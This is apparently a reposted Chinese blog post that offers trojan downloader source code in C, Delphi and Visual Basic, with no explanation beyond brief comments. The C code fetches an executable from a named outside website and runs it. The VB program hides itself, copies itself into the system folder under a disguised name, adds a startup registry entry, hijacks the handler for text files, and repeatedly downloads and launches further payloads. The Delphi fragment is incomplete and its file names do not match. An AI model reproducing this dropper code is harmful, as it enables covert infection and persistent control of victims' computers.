原始出处:http://www.antcodes.cn/post/17.html
C
#include<windows.h>
#include<urlmon.h>
#include<process.h>
#include<Shellapi.h> //这里这个头文件是对ShellExecute的定义
#pragma comment (lib,"Urlmon.lib")
int main()
{
URLDownloadToFile(NULL,"http://www.lzitw.com/kj/hoho.exe","C:/test.exe",0,NULL);
ShellExecute(0,"open","c:/test.exe",NULL,NULL,SW_SHOW);
return 0;
}
Delphi
//调用API
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, forms,
Dialogs, StdCtrls, ExtDlgs, ShellAPI;
//调用的API函数
ShellExecute
URLDownloadTofile
//在Delpihi在窗体运行的那个过程(form1.CREAT)里写上
URLDownloadToFile (0, '木马地址', 'c:/蓝梦泽.exe', 0, 0
ShellExecute (0, 'Open', 'c:/fhm.exe', nil, nil, SW_SHOWNORMAL);
Visual Basic
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)'延迟1秒
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function GetTempPath Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegSetvalueEx Lib "advapi32.dll" Alias "RegSetvalueExA" (ByVal hKey As Long, ByVal lpvalueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long ' Note that if you declare the lpData parameter as String, you must pass it By value.
Const Key_Run = "SOFTWARE/Microsoft/Windows/CurrentVersion/Run"
Const HKEY_LOCAL_MACHINE = &H80000002
Const REG_SZ = 1 ' Unicode nul terminated string
Dim LhKey As Long
Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private Sys As String '系统目录
Private US As String '自己
Private Tmp As String '临时文件夹
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Sub form_Load()
On Error Resume Next
Dim RegEdit As Object, Apppath As String
Dim Cp As String
Dim Ret As Long
Dim sCurrentPath As String, sSystemDir As String
sCurrentPath = App.Path & "/" & App.EXEName & ".exe"
form1.Visible = False
Sys = String(255, 0)
Ret = GetSystemDirectory(Sys, 255)
Sys = Left(Sys, Ret) '获得系统目录
US = String(1024, 0) '获得自己的完整路径
Ret = GetModuleFileName(0, US, 1024)
US = Left(US, InStr(US, Chr(0)) - 1)
Tmp = Temp '获得完整临时目录
If Dir(Sys & "/" & "hoho.exe") = "" Then
Ret = URLDownloadToFile(0, "http://www.lzitw.com/kj/hoho.exe", Sys & "/hoho.exe", 0, 0)
End If
Cp = Sys & "/system.exe"
Ret = RegCreateKey(HKEY_LOCAL_MACHINE, Key_Run, LhKey) '写入注册表,以便开机重启
Ret = RegSetvalueEx(LhKey, "server", 0&, REG_SZ, ByVal Cp, Len(Cp) + 1)
Ret = RegCloseKey(LhKey)
If InStr(UCase(US), "INETDBS") = 0 Then
End If
Apppath = IIf(Right(App.Path, 1) = "/", Left(App.Path, Len(App.Path) - 1), App.Path)
'取得当前路径,如果是在根目录下就要去掉一个“/"
Set RegEdit = CreateObject("WScript.Shell")
RegEdit.regwrite "HKEY_CLASSES_ROOT/txtfile/shell/open/command/", Sys & "/" & "rund1132" & ".exe %1"
On Error Resume Next
Dim cmd As String
cmd = Command()
If cmd <> "" Then
Shell "NOTEPAD.EXE " & cmd, vbNormalFocus
End If
On Error Resume Next
FileCopy sCurrentPath, Sys & "/System.exe"
On Error Resume Next
FileCopy sCurrentPath, Sys & "/" & "/rund1132.exe"
SetAttr Sys & "/" & "/rund1132.exe", 7
'判断程序是否下在运行
If App.PrevInstance Then
End
End If
Kill Sys & "/systrsy.exe"
Do While Dir(Sys & "/" & "systrsy.exe") = ""
Ret = URLDownloadToFile(0, "url", Sys & "/systrsy.exe", 0, 0)
Call Sleep(100000)
Loop
Shell Sys & "/" & "systrsy" & ".exe", vbNormalFocus
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论